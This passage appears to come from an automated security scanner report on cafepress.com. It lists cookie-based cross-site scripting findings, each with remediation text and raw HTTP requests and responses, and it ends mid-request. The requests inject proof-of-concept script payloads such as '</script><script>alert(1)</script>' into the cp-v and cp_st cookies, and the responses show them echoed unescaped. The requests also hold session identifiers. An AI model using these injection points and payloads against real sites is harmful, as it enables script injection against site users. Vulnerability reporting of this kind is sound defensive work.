GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 49072 Date: Sun, 26 Dec 2010 13:49:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49072 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c582f</script><script>alert(1)</script>2b819df52d1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c582f</script><script>alert(1)</script>2b819df52d1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 49112 Date: Sun, 26 Dec 2010 13:49:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49112 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]... s = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'PremiumShop' window.cafepress.tealeaf.searchTerm = 'c582f</script><script>alert(1)</script>2b819df52d1 ' window.cafepress.tealeaf.salesChannel = 'Shop' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10557"-alert(1)-"7c7111c0034 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 75201 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a3f</script><script>alert(1)</script>4b81aaff511 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=97a3f</script><script>alert(1)</script>4b81aaff511 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 75223 Date: Sun, 26 Dec 2010 13:46:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75223 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = '97a3f</script><script>alert(1)</script>4b81aaff511 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 758b2"-alert(1)-"7bb18591cca was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 ntCoent-Length: 41323 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41323 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a79f</script><script>alert(1)</script>f30bd18751f was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4a79f</script><script>alert(1)</script>f30bd18751f ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
